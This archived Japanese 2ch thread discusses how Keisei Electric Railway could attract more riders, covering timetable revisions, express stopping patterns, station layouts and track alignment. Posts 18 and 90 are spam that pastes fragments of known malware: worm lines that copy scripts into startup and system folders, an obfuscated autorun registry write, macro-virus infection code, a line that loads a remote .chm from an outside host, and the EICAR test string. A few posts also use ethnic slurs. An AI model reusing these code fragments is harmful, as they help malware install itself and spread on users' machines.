5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

京成の利用客を増やすためには 【第13部】

1 :名無し野電車区:2006/11/26(日) 23:35:55 ID:bRK4yZS5
テンプレよろしく

2 :名無し野電車区:2006/11/26(日) 23:39:06 ID:bRK4yZS5
前スレ
第12部 … http://hobby7.2ch.net/test/read.cgi/rail/1157212625/

第11部 …http://hobby7.2ch.net/test/read.cgi/rail/1152411306/l50

過去スレ
第1部 … http://hobby7.2ch.net/test/read.cgi/rail/1105587030/
第2部 … http://hobby7.2ch.net/test/read.cgi/rail/1116961256/
第3部 … http://hobby7.2ch.net/test/read.cgi/rail/1120645923/
第4部 … http://hobby7.2ch.net/test/read.cgi/rail/1125821756/
第5部 … http://hobby7.2ch.net/test/read.cgi/rail/1128081238/
第6部 … http://hobby7.2ch.net/test/read.cgi/rail/1130934672/
第7部 … http://hobby7.2ch.net/test/read.cgi/rail/1133954039/
第8部 … http://hobby7.2ch.net/test/read.cgi/rail/1139578761/
第9部 … http://hobby7.2ch.net/test/read.cgi/rail/1146046571/
第10部 … http://hobby7.2ch.net/test/read.cgi/rail/1148998959/
第11部 … http://hobby7.2ch.net/test/read.cgi/rail/1152411306/

・新スレはできるだけ>>970以降に立てましょう
・「はしのえみを」「大平」「電波厨」等の書き込みは華麗にスルー[レスアンカー(>>xxx)全面禁止!]し、必要な場合は削除依頼へ
→NGワードに登録しておくと無問題(登録方法が分からない方は検索する)
・なるべくsage進行
・スレタイは「京成の〜」ですが、
京成の子会社及び関連各社の話題も(ある程度)おkです。


3 :名無し野電車区:2006/11/26(日) 23:59:31 ID:wzP+x/40
DQN馬鹿登場!
↓↓↓↓↓↓

4 :名無し野電車区:2006/11/27(月) 00:38:32 ID:l3BBQRTv
上野御徒町まで延伸すればいい。

5 :名無し野電車区:2006/11/27(月) 02:07:39 ID:R9bu+RqR
高砂と青砥間の川の上に二駅を合体したでっかいちゃんとした駅をつくりなさい。
特急連続停車もなくなるし、各方面行くにも分かりやすくなるだろ。


金町線用2線、下り2線、北総2線、ライナー専用2線、降車専用1線、始発専用1線、上り2線くらい必要だ

6 :名無し野電車区:2006/11/27(月) 08:19:43 ID:m81IQ+LW
朝の下り特急は快特になるだろ

7 :名無し野電車区:2006/11/27(月) 08:32:15 ID:t/jvmS2O
終了

8 :名無し野電車区:2006/11/27(月) 11:32:38 ID:sdUKevJ9
>>6
残念ながら朝の下り快特は土休ダイヤ羽田発の1列車のみ。
平日は佐倉〜成田間快速の2分続行なんていうのがある。

9 :名無し野電車区:2006/11/27(月) 12:41:53 ID:m81IQ+LW
マジカヨ、ソースは?

10 :名無し野電車区:2006/11/27(月) 15:01:27 ID:06V3Sf4o


                   京成スレ乱立させるなクズドモが。

11 :名無し野電車区:2006/11/27(月) 17:20:24 ID:y68UOf7V
本スレに統合。
このスレは終了。即座に移動汁。
びゅんびゅん京成@2ch[第81部]
http://hobby7.2ch.net/test/read.cgi/rail/1164385024/

12 :名無し野電車区:2006/11/27(月) 17:26:01 ID:LHePj9ox
浅草線直通をダイヤの基本にしろ
日暮里・上野に固執してると将来はない

13 :名無し野電車区:2006/11/27(月) 18:13:32 ID:iCzJ+u69
>>12
浅草線に通過施設ができて、ライナーが入れるようになれば、あるいはね。


14 :名無し野電車区:2006/11/27(月) 18:27:11 ID:T0CjEgmJ
京成の本社って押上だろ?
だったら浅草線重視でいいじゃん。少なくとも現状の京成上野よりかは浅草線といえども日本橋とかの方が立地ははるかによい。問題はターミナル駅としての構造になっていないことだが。

15 :名無し野電車区:2006/11/27(月) 19:52:07 ID:9wt9iPTf


                   京成スレ乱立させるなクズドモが。

16 :名無し野電車区:2006/11/27(月) 23:12:22 ID:iCzJ+u69
>>14
わかってるじゃん、浅草線系統の致命的な欠点。

17 :名無し野電車区:2006/11/28(火) 01:28:42 ID:mSdyZvjY
押上駅は新東京タワーの絡みで大改造があるのではないだろうか・・・
新東京タワーが出来たときに今のままではホームから人が転げ落ちそうな悪寒。
なおかつ、狭い階段一本では将棋倒し続出の悪寒・・・

18 :名無し野電車区:2006/11/28(火) 01:37:17 ID:yE5KzfZQ
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

19 :名無し野電車区:2006/11/28(火) 07:11:59 ID:3HmE5KXv
>>11、ガキ臭いことするな

20 :名無し野電車区:2006/11/28(火) 10:23:57 ID:v5lo6UnF
>>17
押上駅は業務は京成だけど、所有は東京都だからいくら京成が改良の必要性を
感じても、東京都に改良する意思がないとむずかしいんじゃない?
しかも駅の所在地は東武の所有だから、当然改良するとなると東武の協力が
ないと難しそうだし…

21 :名無し野電車区:2006/11/28(火) 12:49:15 ID:mv4U8LtE
>>20
東武の協力を得るのは、そう難しいことでもないと思うがね。
京成は、成田空港から外国人客を直でタワーに送り込んでくれる。
しかも、羽田空港からは地方からの旅行者だって一本で来るわけだ。
東武は駅直結の系列ホテルを建ててお待ち申し上げていればウマー。
押上行ライナーの運行をニンジンにすれば、乗ってくるかもよ。

つか、せっかく東武が京成の利用者増に貢献してくれるんだから、
京成もただウマーウマー言うとるだけやなしに、
玄関くらい外国人サイズに合わせとけぇ言う話なわけやけど。


22 :名無し野電車区:2006/11/28(火) 17:28:45 ID:yonhxC8C
残念、本社は八幡に移転

23 :21:2006/11/28(火) 18:15:54 ID:mv4U8LtE
>>22
誰へのレスだ? おれじゃねーよな? 本社のこと何も言ってねーし。

つか、本社が八幡って何よ。そんなことが決まってんの?
京成百貨店潰して本社建てるってことか?
1階のリブレは残しといた方がいいと思うが…

24 :名無し野電車区:2006/11/28(火) 19:24:51 ID:UfzDnZM3


                   京成スレ乱立させるなクズドモが。




25 :名無し野電車区:2006/11/28(火) 23:40:11 ID:ROGyPeo3
>>23
真偽不明。
今のところは話半分にしておくがいいよろし。

26 :名無し野電車区:2006/11/29(水) 09:19:08 ID:OBjRZWCN
>>21
京成押上の2社局と東武押上の2社双方の連携・協力無しには改良できない悪寒

27 :名無し野電車区:2006/11/29(水) 19:38:46 ID:I/W+Qwgs
http://airplug.cocolog-nifty.com/bellz/
↑ここで「さよなら都営5200形」のときの踏み切りで
止まったときの、音源が流れた〜。

byてつおんあわー


28 :名無し野電車区:2006/11/29(水) 22:18:16 ID:SxUs6Nsb
>>21
新タワー 世界一じゃないんだって・・・

【不動産】新東京タワーのデザインを発表・東武鉄道 [11/24]
http://news18.2ch.net/test/read.cgi/bizplus/1164375087/

258 名前:名刺は切らしておりまして[] 投稿日:2006/11/28(火) 20:55:53 ID:x4j5zS6i
この新東京タワー(墨田タワー)って完成しても「一度も世界1の高さ」のタイトルを取れないらしいなw
イギリスのタイムズの報道によるとたった610mなら完成したときは中国やロシアのテレビ塔に抜かれ
ドバイやソウルのオフィスビルにさえ高さで抜かれるらしいw

264 名前:名刺は切らしておりまして[] 投稿日:2006/11/28(火) 22:50:42 ID:x4j5zS6i
オフィスタワーでさえNY・香港・ドバイ・ソウルなどに800mクラスの着工待ちが目白押し(これらは1棟で建築費は2000億以上かかる)
単なる500億のテレビ塔なのに「自立型の電波塔では高さ世界一の610メートルとなる」という誇大詐欺は問題


29 :名無し野電車区:2006/11/30(木) 08:29:08 ID:ojXHrvE9
朝の下りは快特ないのか
8時9時台着は快特にすべきだろ
空港通勤客を馬鹿にせず柔軟にやれアホ京成


30 :名無し野電車区:2006/11/30(木) 09:36:13 ID:Dozranv2
>>29
通特・快速を廃止して新たに急行を作ればおk。

停車駅は、京成津田沼以東は現通特と、以西は本線は現快速と同じ、押上線内は現急行と同じで。

31 :名無し野電車区:2006/11/30(木) 21:28:59 ID:vBSgxPk4
>>30
立石と曳舟なんか停めるな!

32 :名無し野電車区:2006/11/30(木) 22:14:21 ID:vj/d4T1i
時刻表のフラゲが始まったみたいで、びゅんびゅんでは盛りあがってますよ。

33 :名無し野電車区:2006/12/01(金) 14:33:10 ID:f0X93P3k
>>31
じゃ押上線内も現快速に合わせればおk?

34 :名無し野電車区:2006/12/01(金) 23:13:58 ID:D65Xw3+h
>>33
それでいいだろう。

35 :名無し野電車区:2006/12/01(金) 23:20:48 ID:9ljsJZVu
>>29
むしろ、通勤時の空港着はすべて特急にするべきなんですよ
"酒々井・公津"からの空港通勤客へ柔軟に対応するために今回の措置になったようなもの。

36 :名無し野電車区:2006/12/02(土) 07:08:40 ID:M3NWUtoo
成田新高速が開通したら、空港線の枠の奪い合いになる訳だよねぇ
本線側はだいぶ東成田線に振り分けられるんだろうなあ
その辺の絡みを予測しながら、今回の改正を読み解くと、どんな感じ?

37 :名無し野電車区:2006/12/02(土) 08:14:19 ID:FkRYGuuE
>>36
空港2駅の容量が増強されるので、枠を奪い合わなくても純増できる。
あえて言えば、今回の改正で日中の快速が空港に入らなくなった分余裕ができた。

38 :名無し野電車区:2006/12/02(土) 11:16:14 ID:WfkTSvJu
>>37
今まで日中に空港行きの快速ってあったっけ?

39 :名無し野電車区:2006/12/02(土) 12:10:28 ID:FkRYGuuE
>>38
浅草線までエア快だったうちの半分弱。
80分毎しかないけど。平日917Hほか。

40 :名無し野電車区:2006/12/03(日) 13:19:55 ID:ihvHzbts
で、今回の改正は利用客増と見るべきか、減と見るべきか。。。

41 :名無し野電車区:2006/12/03(日) 14:04:08 ID:0Qsqyo0c
>>40
減の要因何よ?w

42 :名無し野電車区:2006/12/05(火) 10:33:41 ID:uRq+JOl6
>>40
方向性として「利用客数」より「コスト」を重点ファクターにした改正という印象。
利用客→ほぼ変わらず(微増?)
コスト→低下
トータルで増収、みたいな。

43 :名無し野電車区:2006/12/05(火) 12:43:01 ID:TsbwZpQv
日中の千葉線分離に続き、今度は金町線の完全分離。
ここにきてずいぶんと回転が早くなったな、京成電鉄。
まさかこの時期に金町線高架化の公式アナウンスが出るとは…

44 :名無し野電車区:2006/12/05(火) 12:54:51 ID:TsbwZpQv
客が減る要因はないね、確かに。
特急の空港アクセスが佐倉以東の各駅化で数分遅くなるが、
JR快速に対する優位は揺るがんから客が減ることはない。
むしろ、ライナー船橋停車で特急からライナーに移行する人が出ればウマー。
上野からライナー使ってた人が船橋乗車に移行しないかって意見もあったが、
そんなやつらは最初からN'EX使ってるだろうから関係ない。

本スレではあれやこれやと細けぇこと突っ突いて糞ダイヤ言ってる奴も多いが、
全体的に見れば良くできていると思うよ、今回は。

45 :名無し野電車区:2006/12/05(火) 12:57:30 ID:kXDaoR5G
ゾーンダイヤって奴かな

46 :名無し野電車区:2006/12/05(火) 19:06:46 ID:ydZ2sFYR
日中は宗吾―芝山にしてほしかった。今回のダイヤ改正、文句はこれだけ。

47 :名無し野電車区:2006/12/05(火) 19:34:54 ID:y79RN2y9
>>46
それをやるメリットが全くないと思うが。

48 :名無し野電車区:2006/12/05(火) 23:19:26 ID:Yq3qI/sB
>>46
ちょww 文句の付けどころおかしいだろwww

49 :名無し野電車区:2006/12/05(火) 23:30:14 ID:3clVq8JQ
>>47-48
芝山方面から佐倉・都心方面に行き来するのに
成田での乗換を階段を使わないようにするための
手段としてでは?

ま、実際に京成がやる気になることはないとは思うけど。

50 :名無し野電車区:2006/12/06(水) 00:02:59 ID:X5OgA+Mp
昔あった、成田行き始発から、宗吾参道からの始発に乗り換えるのがあったね。

51 :名無し野電車区:2006/12/06(水) 09:25:00 ID:MjAk4+ml
金町線の高架化で客がへるのかな〜

ttp://www.keisei.co.jp/keisei/kouhou/news/18-052.pdf


52 :123:2006/12/06(水) 23:33:26 ID:yRtkRHyf
>>51 多分減るでしょう。通勤時間帯本線直通で座って行かれるのが
メリットだから。高砂乗り換えでどうせ立って都心通勤なら常磐各駅使うでしょうね。


53 :名無し野電車区:2006/12/07(木) 02:45:13 ID:Y4nn9X4O
あとは成田新高速開通後に船橋〜高砂のLRT化だな


54 :名無し野電車区:2006/12/07(木) 05:50:56 ID:sXHQ0HFV
( ´_ゝ`) フーン

55 :名無し野電車区:2006/12/07(木) 10:15:14 ID:GIqvBKHJ
>>53
高架走るLRTってちょwwwwwwwwwwおまwwwwwwwwwwイラネwwwwwwwwww

56 :名無し野電車区:2006/12/07(木) 13:35:51 ID:adZ990GQ
マニラだかジャカルタだかクアラルンプールだかにはあるな、
高架鉄道をLRTで作って年がら年中パンクしてるトホホ路線。

57 :名無し野電車区:2006/12/08(金) 09:13:46 ID:QX1z/N0y
>>53
新金線複線化旅客化すれば、それで良いんじゃないか?

58 :名無し野電車区:2006/12/09(土) 20:02:25 ID:E4Urg9Xb
明日の改正で・・・

59 :名無し野電車区:2006/12/09(土) 22:29:54 ID:6c1JOCjm
くそう乗り入れっていうのはお互いのメリットがあるからやるのに
雲助新京成の千葉線乗り入れって何考えてるんだ?
お蔭で上野直通が激減じゃないかよ。
上野には用があっても松戸なんて僻地にこちとら金輪際用はねえ。
八柱だの初富だのの千葉インディアンは梨畑の泥着いた靴で洗練
された幕張の都会を汚すんじゃねえ
まさか京成は千葉線を新京成に委託するとかいわねえよな?


60 :名無し野電車区:2006/12/09(土) 22:32:40 ID:/DA2LB8y
ノートン先生が怒った?

61 :名無し野電車区:2006/12/10(日) 00:23:13 ID:k1+T2A8F
>>59
くそしてから寝る

まで読んだ。

62 :名無し野電車区:2006/12/10(日) 06:31:15 ID:EzF7z0fC
>>59
千葉線から上野まで普通で乗りとおすなんて・・・謎すぎる。

63 :名無し野電車区:2006/12/10(日) 12:44:36 ID:mOFOjaYA
それは偽沿線民だから。

64 :名無し野電車区:2006/12/10(日) 14:55:29 ID:fh11x2J9
現実を知らず、時刻表だけ見て文句を言うヲタが多すぎるんだよな

65 :名無し野電車区:2006/12/10(日) 16:17:28 ID:pGTqGpsl
京成の最大のネックは八幡じゃないかなぁ…

優等が停まる駅で緩急接続できないから、東中山とかで各駅がどん詰まりになるのがどうも…

漏れは腰怪我していて八幡から海神使って船橋中央病院に通ってるんだけど東中山で行きも帰りもバカみたいに待たされる

八幡が4線あって緩急接続できれば、負担も減っていいんだけどねぇ



66 :名無し野電車区:2006/12/10(日) 16:50:13 ID:aRKi8Re6
上博日新町千関堀お青高小江国市菅八鬼中東西海船大競谷津大実八大勝志ユ臼佐大酒宗公成第空
野物暮三屋住屋切花砥砂岩戸府川野幡越山中船神橋神馬津田久籾千和田津ー井倉佐々吾津田.2港
●●●━━━━━━━●━━━━━━━━●━━━━━━●━━●━━━●━●━━━━●●● 快特
●●●━━━━━━●●●━●●━●━━●●━●━●●●━━●━●━●━●━●━●●●● 特急

67 :名無し野電車区:2006/12/10(日) 17:22:12 ID:7mXPGhBt
上日新町千関堀お青高小江国市菅八鬼中東西海船大競谷津大実八大勝志ユ臼佐大酒宗公成第空
野暮三屋住屋切花砥砂岩戸府川野幡越山中船神橋神馬津田久籾千和田津ー井倉佐々吾津田.2港
●●━━━━━━●●━━━━━━━━━━━●━━━●━━●━━━━━●━━━━●●● 快特
●●━●●━●━●●●━●●━●━━●━━●━●━●━━●━●━●━●━●━●●●● 特急




68 :名無し野電車区:2006/12/10(日) 20:06:04 ID:dVkuUt0Z
上日新町千関堀お青高小江国市菅八鬼中東西海船大競谷津大実八大勝志ユ臼佐大酒宗公成第空
野暮三屋住屋切花砥砂岩戸府川野幡越山中船神橋神馬津田久籾千和田津ー井倉佐々吾津田.2港
●●━━━━━━●●━━━━━━━━━━━●━━━●━━━━●━━━●━━━━●●● 快特
●●━━━━━━●●━━━━━●━━━━━●━●━●━━●━●●●●●●●●●●●● 特急


69 :名無し野電車区:2006/12/10(日) 23:01:37 ID:mOFOjaYA
>>59 みっけた

25: 2006/12/10 21:51:30 bfMPelg9
>5 君に恨みはないけれど、こちら千葉市民も八柱とか増富とか千葉内陸馬賊の棲む
新京成沿線には全く用がないので今回の改正は大変迷惑。上野直行激減どころか
津田沼での乗り換えが階段越しになって非常に不便になった。
スイッチバックしてでも新京成から上野や都営直通にでもしてやれば少しは
内陸馬賊どもも宣撫されやすくなっただろうに。
今後都内へ出るのにこれまで乗車駅のホームに階段が無く上野へ直行出来るか
階段無しで急行や特急に乗り換え出来ることで京成使ってた年寄りなどは
京成使わなくなるだろうね。往復千円近いから運賃収入も減るだろう。

70 :名無し野電車区:2006/12/10(日) 23:04:05 ID:mOFOjaYA
津田沼にエレベータ・エスカレータが付いた事さえご存知ない様子

71 :名無し野電車区:2006/12/10(日) 23:12:16 ID:U3nqZs4O
京成本線の青砥〜京成津田沼間は複々線化すべき
http://hobby7.2ch.net/test/read.cgi/rail/1165738298/l50

72 :名無し野電車区:2006/12/11(月) 13:18:41 ID:6Ugsv1Ze
age

73 :名無し野電車区:2006/12/11(月) 14:51:01 ID:FD8kaGSE
成田新高速にスカイライナーを追い出せば、小岩と東中山での長時間停車も改善されるかな。
それとも待避地点が高砂付近・東中山・津田沼・佐倉であるうちは改善しないかな。

74 :名無し野電車区:2006/12/11(月) 18:09:03 ID:42TLWwVv
>>73
スカイライナーがなくなっても、
高砂(小岩)から、船橋競馬場まで逃げ切るのは無理だと思うので
待避パターンは変えられない→各駅停車の改善は難しい。

待避パターンそのものを
市川真間・津田沼・佐倉にすれば改善にはなるのだろうけど
上野〜市川真間や、市川真間〜津田沼で
各駅停車は逃げ切れるかな。

75 :名無し野電車区:2006/12/12(火) 02:17:29 ID:0Vunn/7i
久々に総武に乗ったんだが、総武は各停・快速の(線路別)複々線。
京成は基本的に複線。
仮に線形、車両、運賃にアクセスまで同じだとしても、線路容量が根本的に違うからな。
両者が限界に達したら、先にキャパが上限に達するのは京成のほうだ。

京成が方向別複々線で緩急接続を考えたダイヤにしていれば、総武に勝てそうな気もする。
もちろん、実現性は無いだろうけどな。
ライバルである総武の評判は、良くはないんだよな。
あの線路別複々線という線路構造と、ダイヤ構成がな。
これで方向別複々線で、ダイヤもよければ、京成に勝ち目は無いだろうな。

そういえば、常磐も中央も線路別複々線だったっけかなぁ。(お茶の水は方向別だが)
JRってのは、利用者の利便性ってのを考えて作ってるのか??

76 :名無し野電車区:2006/12/12(火) 04:00:35 ID:g6Jelwdd
>>75
仮に線形、車両、運賃にアクセスまで同じだとしても、
方向別複々線と線路別複々線じゃ、線路容量が根本的に違う。
両者が限界に達したら、先にキャパが上限に達するのは方向別複々線のほう。

そういえば、お茶の水じゃなくて、御茶ノ水な。



なんか微妙にパクってみた。
錦糸町は方向別でもいいと思うが、それ以外の駅の方向別は完全な無駄でしかない。
首都圏のラッシュをわかって言ってるのか?

77 :名無し野電車区:2006/12/12(火) 07:35:20 ID:Q+hB/gKM
そんな冷蔵庫を間に受けた人につらく当たらんでも。

78 :名無し野電車区:2006/12/12(火) 13:26:41 ID:8GCuryCm
総武にしろ中央にしろ、束は快速と各停で均等に客を乗せたいわけだろ?
各停の駅の客には最初から最後まで各停に乗ってもらおうと。
船橋から茶水に行きたい人は、錦糸町で乗り換えたりなんかしない。
その辺の考え方が、私鉄や酉のアーバンとは根本的に違うわけで。

79 :名無し野電車区:2006/12/12(火) 21:25:39 ID:PQg3cir1
>>77
言うことは言うけど実行力の無い冷蔵庫ペタウザスなんだが

>>78
>船橋から茶水に行きたい人は、錦糸町で乗り換えたりなんかしない。
漏れが錦糸町or東京で乗り換えてるのは無視ですかそうですか

80 :名無し野電車区:2006/12/12(火) 21:41:30 ID:Qw8WzaCR
JRの線路別複々線の歴史は国鉄時代、いや省線時代まで遡る。これは緩急接続よりも遠近分離(列車線・電車線)貨客分離が目的。
茜の京阪神方向別複々は確かによくできている。これは緩急接続を考慮したもので76のいうとおり首都圏のJRでは確かにきついだろう。
しかし京急なんかJRの3複線を相手に複線で普通電車の合間に快特120`運転で東海道やスカ線(総武でいえば快速に相当)を並行区間で追い抜きを演じたりしてるからファンが多いんだろうね。

81 :名無し野電車区:2006/12/12(火) 22:00:25 ID:03qmgaSv
>>80
京成も京急ほどじゃないけど、加減速の良い車両が走っているのに、
如何せん線形が悪すぎるんだよなあ。

82 :名無し野電車区:2006/12/13(水) 01:30:26 ID:C7RcY/iZ
京成船橋も線形悪いまま高架化しちゃったしね
県と市は、地下化で曲線大幅緩和を勧めたらしいけど
結局は、JRに対抗するだけのお金がないんだよね
それに尽きるね

83 :名無し野電車区:2006/12/13(水) 01:45:31 ID:ChIhE8Ob
お金ではなくメリットだろ

84 :名無し野電車区:2006/12/13(水) 16:51:18 ID:Z1yVh1U9

上日新町千関堀お青高小江国市菅八鬼中東西海船大競谷津大実八大勝志ユ臼佐大酒宗公成第空
野暮三屋住屋切花砥砂岩戸府川野幡越山中船神橋神馬津田久籾千和田津ー井倉佐々吾津田.2港
●●━━━━━━━━━━━━━━━━━━━▲━━━━━━━━━━━━━━━━━▲●● SL
●●━━━━━━●▲━━━━━━━━━━━●━━━●━━●━━━━━▲━━━━●●● 快特
●●━━━━━━●●━━━━━●━━━━━●━━━●━━●━●━━━●━━━━●●● 特急
●●━━━━━━●●●━━━━●━━●━━●━●━●●●●●●●●●●━●●●●●● 通快
●●━●●━●━●●●━●●━●━━●━━●━●●●●●●━●━●●●━●━●●●● 快速


85 :名無し野電車区:2006/12/13(水) 18:27:12 ID:zfEULKuU
野暮ワロタ 当たらずも遠からずw

86 :名無し野電車区:2006/12/14(木) 01:56:56 ID:hsCGnblT
総武緩行線で千葉方面から東京駅に行くなら、錦糸町より秋葉原乗換えもいるんじゃないか。
中央の快速停車駅まで行くなら、御茶ノ水が方向別なんで、ここで乗り換えると思う。
中央の快速通過駅までなら、緩行線だけで行く人が多いような気がする。

冷蔵庫って、乗客の立場からすると、「そうして欲しい」ってのも多いんだよな。
実現の可能性という点では極めて0に近いが、客の立場としてはそうなったら良いなと思う意見は多い。
根本的に何か勘違いしてる意見も多々あるけど。

総武・常磐・中央を方向別に改造するとして意見を求めたら、鉄ヲタは別として、一般人には賛成も多いかもな。
首都圏の通勤路線なんていう高需要路線だからこそ、金をかけるだけの価値があるとも言える。


>>81
線形が悪いからこそ、優等でも加減速性能に優れた車両なのでは。
線形が良くて、快特や特急並に通過するなら、あまり加減速性能はいらないだろ。
各停には必要なんだろうけど。
冷蔵庫ついでに、冷蔵庫って「加減速性能の悪い車両はけしからん」みたいなことも言ってたなぁ。

87 :名無し野電車区:2006/12/14(木) 05:43:08 ID:GpYsy8bV
>>82
船橋駅の上野方とか、極端な急カーブは一応改良しているぞ。
そりゃあ、S字カーブを解消してJR駅直下か直上に京成駅を
移転できれば理想的だけど、誰が金出すの?
京成じゃなければ税金だぞ。まあ、他の先進国なら、税金だけどな。

88 :名無し野電車区:2006/12/14(木) 10:21:53 ID:I5b1RtwA
>>82
JRから離す方法もあったかもしれないけどそれじゃ利用者が…。

89 :名無し野電車区:2006/12/14(木) 21:48:46 ID:s4oA7dpr
いっそ駅自体を無くした方が良かったのでは。勝田台とセットで。

90 :名無し野電車区:2006/12/14(木) 21:52:21 ID:U1KHwgbZ
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

91 :名無し野電車区:2006/12/14(木) 21:59:47 ID:3i61V8Gx
実際問題として、強制収用できないのにどうやって長距離の線形改良をするんじゃってことだろうけどな。
船橋に限らずだけど。

船橋の場合、総武鉄道(現東武野田線)を東武系に取られていなければ
今の東武船橋駅・東武百貨店の所に京成を持ってこれたのだろうけどな



92 :名無し野電車区:2006/12/14(木) 22:14:51 ID:gBJqxOeA
八幡と船橋が2面4線で緩急接続できたらなぁと、いまさらながらに思う。

でも土地の関係で無理か。

93 :名無し野電車区:2006/12/15(金) 10:02:49 ID:IniaxCvI
>>91
せめて西武のあたりに駅があれば。それが京成の中途半端なところ。

94 :名無し野電車区:2006/12/15(金) 12:20:25 ID:9W7GYe1s
都心がダメなら郊外はなんとか開発できんのかな


95 :名無し野電車区:2006/12/15(金) 12:38:16 ID:5/YD51j5
>>94
公・・・・・・

葛飾区や墨田区にはマンション建てているが・・・・
都心ではないな。

96 :名無し野電車区:2006/12/15(金) 15:03:19 ID:uUR5LXtj
>>88
14号に沿って、市役所辺りに駅作れればいちばんよかったんだよ。
それこそ、開通時か終戦後すぐとかにな?
んで、京成駅と国鉄駅との間を繁華街化させる。
複々線化される前に、そうしていればよかった。



ただ、チョンどものせいとかいろいろで、そうはならなかった。

97 :名無し野電車区:2006/12/15(金) 17:09:06 ID:NjXMxL7+
知ったような口を利く割に、
市役所近辺が海っぺりだった事も知らない↑

98 :名無し野電車区:2006/12/15(金) 19:20:59 ID:FxpH+To8
知ったような口を利く割に、
船橋はほとんど海だった事も知らない↑


99 :名無し野電車区:2006/12/15(金) 20:10:44 ID:NjXMxL7+
くやしいか?くやしいのか?ん?

昭和30年代に埋め立てされるまでは遠浅の砂浜。
今の市役所近辺は漁師町で満潮時に道路が冠水したりしていた。
この辺りはその時代に生きてない俺でさえ、知識として知ってる。
チョンの歴史ばかり詳しくなると、恥ずかしい人間になっちゃうよ。

100 :名無し野電車区:2006/12/15(金) 20:13:38 ID:DBRSKyoZ
100

101 :名無し野電車区:2006/12/15(金) 20:59:32 ID:SoCnKGoL
船橋市役所は三田浜楽園という海辺の保養地だった
京成の谷津〜海神はほぼ海岸線だった
谷津遊園にあったジェットコースターは海に突きでていて
当時としては革新的な眺望を持っていた
八景島シーパラダイス化することが可能だったのに
マンションにしてしまったのが谷津の敗因


102 :名無し野電車区:2006/12/15(金) 21:04:45 ID:+T0vRME1
谷津遊園ナツカシス

103 :名無し野電車区:2006/12/15(金) 21:15:34 ID:NjXMxL7+
>>101 うわ、恐れ入ります。
実際問題、>>98のような案は実現可能であったと考えられますか?
よかったら、お聞かせ下さい。
私個人としては、トンデモだと感じます。状況認識さえ疎かなので。

104 :名無し野電車区:2006/12/15(金) 21:16:28 ID:NjXMxL7+
>>98→正>>96

105 :名無し野電車区:2006/12/15(金) 21:22:49 ID:NjXMxL7+
あと、谷津遊園の件ですが、この辺りはやはり朝日土地興業というキーワードが欠かせなくなりそうですね。
埋め立て、オリエンタルランド、ヘルスセンター、、

106 :名無し野電車区:2006/12/15(金) 21:48:29 ID:86r/vF8S
>>101
横レスだけど、
開業時だったら可能だったとおもう。ただ、そのあとは無理でしょう。
京成⇔省線の乗り換えは、戦前からあったわけで、
用地の手当がついても(当時は市役所周辺が海岸線だったので、用地は取得できただろうけど)
利便性を考えると移転はできなかったとおもう。
「船橋通過すれば利用者増えるんじゃない?」という考えがありえないのと一緒だわな。


107 :名無し野電車区:2006/12/15(金) 22:21:48 ID:NjXMxL7+
ですね。当時の船橋の街の規模からしても有り得ない。せっかく中心部にある駅をわざわざ街外れに移転するなんて狂気の沙汰。
それより、JR船橋より北に住んでる人達って京成利用率ってどんなもんなんでしょうね。
